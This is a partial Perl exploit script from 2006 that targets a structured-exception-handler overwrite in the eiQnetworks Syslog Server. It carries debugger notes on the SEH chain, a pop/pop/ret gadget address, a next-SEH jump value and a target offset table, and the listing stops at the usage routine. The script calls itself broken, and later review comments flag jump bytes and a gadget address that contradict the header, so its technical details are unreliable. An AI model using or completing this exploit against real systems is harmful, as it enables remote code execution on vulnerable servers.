1 #!/usr/bin/perl -w
2 #
3 # http://www.digitalmunition.com
4 # written by kf (kf_lists[at]digitalmunition[dot]com) - 03/23/2006
5 # Bug found by KF of digitalmunition.com.
6 #
7 # http://www.zerodayinitiative.com/advisories/ZDI-06-023.html
8 #
9 # Exploit for the Syslog Server by eiQnetworks (OEM'd to several vendors)
10 #
11 # There MUST be a syslog service listening on port 12345 for this to work. The syslog service is not enabled by default.
12 #
13 # Currently broken: this overwrites the SEH on XP SP1 but still needs working shellcode. Perhaps a backward (reverse) short jmp instead of a
14 # forward jump would eliminate the need for two stages of shellcode.
15 #
16 #SEH chain of thread 00000FF4
17 #Address SE handler
18 #013ECEF8 FWASyslo.00449EDB
19 #013EFF78 WS2HELP.71AA15CF <-------- I set this address.
20 #
21 #013EFF74 90909090
22 #013EFF78 909032EB Pointer to next SEH record <--- I set this.
23 #013EFF7C 71AA15CF SE handler <--- pop pop ret (POP EDI / POP EBP / RETN 8, disassembled below)
24 #013EFF80 90909090
25 #
26 #71AA15CF 5F POP EDI
27 #71AA15D0 5D POP EBP
28 #71AA15D1 C2 0800 RETN 8
29 #
30 # View the SEH Chain and set a break on the address of the JMP code. This will let you debug the stage one shellcode.
31 #
32 use IO::Socket;
33
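# Buffer size; referenced by the socket code later in the script (not shown here).
$bufsize = 4096;

# Default target host; replaced by the second command-line argument further down.
$hostname = "127.0.0.1";

# Both payload values below are raw x86 little-endian dwords.  pack("V") is
# explicitly little-endian on any host CPU; the original pack("l") was
# host-endian and would have reversed the bytes on a big-endian attacker box.
#
# Value written into the "pointer to next SEH record" slot, executed as code
# after the pop/pop/ret gadget.  As packed this is the byte sequence
# 90 90 06 EB: the EB (jmp short) is the LAST byte, so its displacement is taken
# from the byte that follows in the record (the first byte of $sehandler, per
# the layout in the header) rather than being a "jmp short +0x06" as the
# original comment claimed.  The debugger dump in the header shows 909032EB in
# this slot instead.  NOTE(review): confirm which encoding is intended.
$nextserec = pack("V", (0xEB069090));

# SE handler: pop edi / pop ebp / retn gadget in ws2help.dll, sent little-endian.
# This is a hard-coded, non-relocated address and is only valid for the exact
# Windows build it was taken from (XP SP1 per the header).  NOTE(review): the
# header's debugging notes use 0x71AA15CF (POP EDI / POP EBP / RETN 8) for this
# gadget; the value here differs - verify against the target's ws2help.dll.
$sehandler = pack("V", (0x71abe325));

# Target table, "<binary>:<offset>" where <offset> is the number of bytes sent
# before the SEH record is overwritten.  Binary hunts performed by JxT and Titon.
$tgts{"0"} = "G2SRv4.0.36.exe:932";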
42
43 unless (($target,$hostname) = @ARGV,$hostname) {
44
45 print "\n Syslog by eiQnetworks exploit, kf \(kf_lists[at]digitalmunition[dot]com\) − 03/23/2006\n";
46 print "\n\nUsage: $0 <target> <host>\n\nTargets:\n\n";
47
48 foreach $key (sort(keys %tgts)) {
49 ($a,$b) = split(/\:/,$tgts{"$key"});
50 print "\t$key . $a\n";